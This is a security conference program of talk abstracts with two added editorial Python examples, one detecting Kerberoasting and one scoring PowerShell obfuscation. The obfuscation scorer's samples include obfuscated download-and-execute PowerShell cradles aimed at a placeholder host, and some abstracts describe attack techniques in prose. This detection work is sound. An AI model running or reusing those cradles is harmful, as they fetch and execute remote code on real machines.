Omar Santos, Cisco

Keynote: IR Lessons Learned 53 68 61 64 6f 77 20 42 72 6f 6b 65 72 73 2c 20 56 61 75 6c 74 20 37 2c 20 61 6e 64 20 53 79 6e 66 75 6c 20 4b 6e 6f 63 6b

In this presentation we will cover several case studies explaining threat exploitation based on target industry types. We will cover several lessons learned while performing forensics of compromised embedded devices and infrastructure platforms. We will examine the details of custom sophisticated malware including SYNful Knock, exploits revealed by the Shadow Brokers, and other examples. We will also discuss lessons learned in incident response and forensics when responding to these types of threats and incidents.

Jared Haight, Microsoft

Keynote: Giving back to infosec: A beginners guide to being helpful

The infosec community is driven by passionate people who give back through software, talks, teaching, etc. It's one of the things that makes our community a "community", but a lot of people don't feel like they have anything to offer. Those who are new to the industry don't feel like they know enough, and veterans don't think they have anything original to contribute.
In this feel-good talk of the year, we'll cover how everyone is an awesome and valuable human being who can help make our industry even better. We'll go over how to contribute to open source projects, how to submit to CFPs, how to help with cons, as well as other ways to help. We'll also talk about the benefits of not being a sponge and how giving back can advance your career, help you make friends, make you more attractive, increase your APMs, and lead you to true happiness.

Jose Fernandez, CompSec Direct

Talk: Frony Fronius – Exploring Zigbee signals from Solar City

Solar equipment is becoming more readily used in homes and businesses due to cost savings, eco-friendly conservationism and current tax incentives. Companies like SolarCity use power inverters/meters from third parties in order to provide their services while keeping the solution affordable for customers. This research will focus on understanding the communication between the inverter, the Internet gateway and the web portal used to view the subscriber's electrical consumption.


Paul Calatayud

Talk: Cyber Defense Automation: A practical guide to maximizing your limited defender resources.

Many security programs have a very complex set of security investments that have created, and continue to generate, a lot of information, putting burdens on cyber defense teams. Coupled with the lack of talent in the industry, new approaches are necessary to dig out of the data holes we have created. This talk will explore practical ways of implementing automation within your cyber defense program.


Paul Coggin

Talk: Hallowed Be Thy Packets

Blue and red teams are missing the low-hanging vulnerabilities that exist in many enterprise networks today. This session will show in detail how the red team can quickly identify and exploit numerous network protocol vulnerabilities that the previous security test team probably missed. Methods for securing routing and switching protocols will be covered. Detailed PCAP examples will be covered. Recommendations for adding visualization and instrumentation to the network to detect network exploits will be covered.

Sean Metcalf, Trimarc Security, LLC

Talk: Detecting the Elusive: Active Directory Threat Hunting

Attacks are rarely detected even after months of activity. What are defenders missing, and how could an attack be detected?
This talk covers effective methods to detect attacker activity using the features built into Windows and how to optimize a detection strategy. The primary focus is on what knobs can be turned and what buttons can be pushed to better detect attacks.
One of the latest tools in the offensive toolkit is "Kerberoast", which involves cracking service account passwords offline without admin rights. This attack technique is covered at length, including the latest methods to extract and crack the passwords. Furthermore, this talk describes a new detection method the presenter developed.
The attacker's playbook evolves quickly, so defenders need to stay up to speed on the latest attack methods and ways to detect them. This presentation will help you better understand what events really matter and how to better leverage Windows features to track, limit, and detect attacks.
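Editor's note: the abstract above does not describe the presenter's own detection method, so the following is an added editorial example, not code from the talk. It implements the widely used heuristic for spotting Kerberoasting in Windows Security event 4769 (a Kerberos service ticket was requested): a single principal requesting RC4-HMAC (etype 0x17) service tickets for several distinct service accounts in a short window, after excluding krbtgt and computer accounts. The event records, time window, and threshold below are constructed assumptions; in practice the records come from .evtx files or a SIEM.

```python
"""Heuristic Kerberoast detection over Windows Security event 4769 records.

Added editorial example, not code from the talk. The sample events below are
constructed, and the window/threshold values are illustrative assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of event 4769 records, already parsed into dicts keyed by
# the event's EventData field names (TargetUserName = requesting account,
# ServiceName = account the ticket is for, TicketEncryptionType = etype).
SAMPLE_4769 = [
    # alice pulls RC4 tickets for four different service accounts within seconds
    {"TimeCreated": "2017-06-01T10:00:01", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"},
    {"TimeCreated": "2017-06-01T10:00:02", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"},
    {"TimeCreated": "2017-06-01T10:00:03", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"},
    {"TimeCreated": "2017-06-01T10:00:03", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "svc_sharepoint", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"},
    # TGS request for the KDC itself: always excluded
    {"TimeCreated": "2017-06-01T10:00:10", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.5", "Status": "0x0"},
    # bob gets an AES ticket (etype 0x12): normal
    {"TimeCreated": "2017-06-01T10:01:00", "TargetUserName": "bob@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.6", "Status": "0x0"},
    # carol: one RC4 ticket for a legacy app, plus a computer-account ticket
    {"TimeCreated": "2017-06-01T10:02:00", "TargetUserName": "carol@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.7", "Status": "0x0"},
    {"TimeCreated": "2017-06-01T10:02:05", "TargetUserName": "carol@CORP.LOCAL",
     "ServiceName": "WS01$", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.7", "Status": "0x0"},
    # dave: three RC4 tickets spread over an hour, below the per-window threshold
    {"TimeCreated": "2017-06-01T10:30:00", "TargetUserName": "dave@CORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.8", "Status": "0x0"},
    {"TimeCreated": "2017-06-01T11:00:00", "TargetUserName": "dave@CORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.8", "Status": "0x0"},
    {"TimeCreated": "2017-06-01T11:30:00", "TargetUserName": "dave@CORP.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.8", "Status": "0x0"},
]

RC4_HMAC = "0x17"  # etype 23; Kerberoast tooling requests RC4 because it cracks fastest


def is_candidate(ev):
    """Keep only successful RC4 service-ticket requests for real service accounts."""
    svc = ev["ServiceName"]
    if svc.lower() == "krbtgt" or svc.endswith("$"):  # KDC ticket / computer accounts
        return False
    if ev.get("TicketEncryptionType", "").lower() != RC4_HMAC:
        return False
    return ev.get("Status", "0x0") == "0x0"  # failed requests are noise for this heuristic


def detect_kerberoast(events, window=timedelta(minutes=5), min_services=3):
    """Return (user, ip, services) for principals that requested RC4 tickets for
    at least min_services distinct service accounts inside one sliding window."""
    by_actor = defaultdict(list)
    for ev in events:
        if is_candidate(ev):
            by_actor[(ev["TargetUserName"], ev["IpAddress"])].append(
                (datetime.fromisoformat(ev["TimeCreated"]), ev["ServiceName"]))
    alerts = []
    for (user, ip), reqs in by_actor.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            services = {svc for ts, svc in reqs[i:] if ts - start <= window}
            if len(services) >= min_services:
                alerts.append((user, ip, sorted(services)))
                break  # one alert per actor is enough
    return alerts


if __name__ == "__main__":
    for user, ip, services in detect_kerberoast(SAMPLE_4769):
        print(f"possible Kerberoast: {user} from {ip} requested RC4 tickets for {services}")
```

On the constructed sample only alice trips the rule; dave requests the same kind of tickets but spread over an hour, which is why the window matters and why the threshold has to be tuned against a baseline of legitimate RC4 use in the environment (legacy applications that still request RC4 will otherwise generate steady noise). Enabling AES on service accounts shrinks the candidate set and makes the remaining RC4 requests stand out.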

Lee Holmes, Microsoft


Attackers, administrators and many legitimate products rely on PowerShell for their core functionality. However, its power has made it increasingly attractive for attackers and commodity malware authors alike. How do you separate the good from the bad?
A/V signatures applied to command line arguments work sometimes. AMSI-based (Anti-malware Scan Interface) detection performs significantly better. But obfuscation and evasion techniques like Invoke-Obfuscation can and do bypass both approaches.
Revoke-Obfuscation is a framework that transforms evasion into a treacherous deceit. By applying a suite of unique statistical analysis techniques against PowerShell scripts and their structures, what was once a cloak of invisibility is now a spotlight. It works with .evtx files, command lines, scripts, ScriptBlock logs, Module logs, and is easy to extend.
Revoke-Obfuscation has been used in numerous Mandiant investigations to successfully identify obfuscated and non-obfuscated malicious PowerShell scripts and commands.
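Editor's note: to illustrate why statistical features catch what a command-line signature misses, here is an added editorial example. It is not Revoke-Obfuscation's code, feature set or classifier; it uses a handful of hand-picked features (random casing, symbol density, backticks, string concatenation and -f format operators) with assumed weights and an assumed threshold. The command lines and hostnames are constructed.

```python
"""Feature-based scoring of PowerShell command lines for obfuscation.

Added editorial example, not Revoke-Obfuscation's code or feature set. The
weights and threshold are assumptions chosen for the constructed samples; a
real classifier would learn them from a labelled corpus.
"""
import re

_QUOTED = re.compile(r"'[^']*'|\"[^\"]*\"")


def features(cmd):
    """Extract a few structural features from one command line."""
    code = _QUOTED.sub("''", cmd)  # casing feature ignores string contents (URLs, paths)
    letters = [c for c in code if c.isalpha()]
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    return {
        # PascalCase cmdlets land around 0.3-0.4; random casing is close to 0.9
        "case_flip_ratio": flips / max(len(letters) - 1, 1),
        # fraction of characters that are neither alphanumeric nor whitespace
        "special_ratio": sum(1 for c in cmd if not c.isalnum() and not c.isspace()) / max(len(cmd), 1),
        # backtick is PowerShell's escape character and is rare in honest commands
        "backticks": cmd.count("`"),
        # 'a'+'b' string building and "{1}{0}" -f reordering
        "concat_ops": len(re.findall(r"""['"]\s*\+\s*['"]""", cmd)),
        "format_ops": len(re.findall(r"""['"]\s*-f\s""", cmd, re.IGNORECASE)),
    }


THRESHOLD = 1.5  # assumed


def obfuscation_score(cmd):
    """Weighted sum of the features above (weights are assumptions)."""
    f = features(cmd)
    score = 0.0
    if f["case_flip_ratio"] > 0.6:
        score += 1.5
    score += 3.0 * f["special_ratio"]
    score += 0.3 * min(f["backticks"], 5)
    score += 0.5 * f["concat_ops"]
    score += 0.5 * f["format_ops"]
    return round(score, 3)


def is_obfuscated(cmd):
    return obfuscation_score(cmd) >= THRESHOLD


# Constructed samples: two ordinary admin commands and three obfuscated forms
# of the same kind of activity. example.invalid is a reserved, non-routable name.
SAMPLES = {
    "plain_gci": r"Get-ChildItem -Path C:\Users -Recurse | Where-Object { $_.Length -gt 1MB }",
    "plain_iwr": r"Invoke-WebRequest -Uri 'https://example.invalid/file.zip' -OutFile C:\temp\file.zip",
    "format_concat": r"""&("{1}{0}" -f 'ChildItem','Get-') -Path ('C:\'+'Users') -Recurse | .("Where"+"-Object") { $_.Length -gt 1MB }""",
    "random_case": r"IeX (NeW-ObJeCt NeT.WeBcLiEnT).DoWnLoAdStRiNg('http://example.invalid/a')",
    "backticks": r"I`n`v`o`k`e-Ex`pr`ess`ion (Get-Content payload.txt)",
}


if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(f"{name:14} score={obfuscation_score(cmd):5.2f} obfuscated={is_obfuscated(cmd)}")
```

The three obfuscated samples share no substring that a signature could key on, yet each one scores above the threshold on a different feature, while the two plain commands stay well below it. That is the shape of the argument in the abstract: obfuscation has to distort the structure of the command to hide its strings, and structure is what the features measure.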

Stefan Edwards, Nvisium

Talk: A penetration testing anabasis

This talk is a short anabasis of someone who uses functional programming to break, rather than build, software. This talk will cover how a college dropout uses languages such as OCaml, Scala, and F# to do digital forensics, reverse engineer IoT firmware, and perform penetration tests on networks and websites alike. Additionally, we will close on ideas on how to use functional programming in modeling architecture, to allow for a more programmatic and logical approach to assessing risk for businesses and systems alike. No specific programming language is assumed, as this talk will wander, Greek-like, across the landscape of breaking and building. The purpose is to explore where functional programming can take an industry not used to formal analysis, and more likely to adopt anarchistic “hacks.”

Killan Ditch, Coalfire

Talk: Desist with Demanding Domain (aka, Stop Skipping the Strays)

Many penetration testers will hop into a network and single-mindedly chase Domain Administrator (DA) privileges. Having achieved that singular goal, some even call it quits and chalk up the test as a win. Various tools and strategies leveraging Active Directory, such as PowerShell Empire, BloodHound, and CrackMapExec, have emerged to assist and even automate the process of initial compromise through pivoting and privilege escalation. However, such tunnel vision on exploiting Windows Active Directory frequently leads to outright dismissal of the impact that the compromise of machines or accounts outside of a domain can have. This talk will explore assorted reasons why testers should consider stray non-member machines worth attacking and stop skipping them in the headlong pursuit of DA. Such consideration will include infrastructure hosts, rogue machines, and forgotten servers.

Esteban Rodriguez, Coalfire

Talk: Do more with less: Combining small findings to make a big impact

In this talk I will go through the process of evaluating an informational finding to find an additional attack surface via a discovered web app. By enumerating virtual hosts on a web server, an attacker can reach applications that were previously undiscovered by a network scan. By exploiting a persistent XSS flaw, I will show how you can gain full control of the application. After gaining control of the application, I will show how to perform post exploitation actions within the application to penetrate further into the target environment. The focus of the talk will be on the WordPress Content Management System. I will explain how to turn any XSS flaw in any plugin into RCE on the WordPress server. I will introduce my toolset, WPForce, which can be used to backdoor core WordPress functionality to log plaintext passwords, dump hashes, inject malicious JavaScript, and pivot to other exploitation frameworks.

Jared Bare, Carfax

Talk: From Port Scanning to Password Cracking: If You’re Not Using These Open Source Tools, You’re Doing It Wrong

This talk/demo will go over the Swiss army knife of open source tools, anywhere from port scanning to password cracking. The major focus of this talk will be on Nmap and utilizing the NSE scripting engine to audit and discover devices within your own network. We will also look at other free tools such as Masscan, Censys.io and Shodan. At the end of this demo the participant should have a better understanding of the tools presented and how to utilize them within their own network. (For the reviewer of this CFP: this talk is better as a workshop, but I can condense it into a talk/demo if needed.)

Arun Warikoo, Express Scripts

Talk: How to build an Enterprise Grade Security Monitoring & Analytics Platform with Open Source

The talk will be on "How to build an Enterprise Grade Security Monitoring & Analytics Platform with Open Source". The presentation will cover what a high-level architecture of a Security Monitoring & Analytics Platform looks like, the vendors in this space, and a high-level design of the platform using open source that incorporates monitoring, analytics and reporting.

Jaime Andres Restrepo, DragonJAR

Talk: Aventuras y Desventuras de un Pentester (Adventures and Misadventures of a Pentester)

A talk that tells you the realities of being a pentester, what nobody tells you when you decide to work professionally in information security, and some recommendations to make your professional life in this field more bearable.

Price McDonald

Talk: Insecure, Obsolete and Trivial: The Real IOT

Over the last few years hardware hacking has become a much more prevalent testing and attack avenue; however, it is often misunderstood. This talk is meant to give a basic understanding of hardware hacking techniques, tips and tricks, in addition to real-world examples and demos using budget-oriented software and hardware.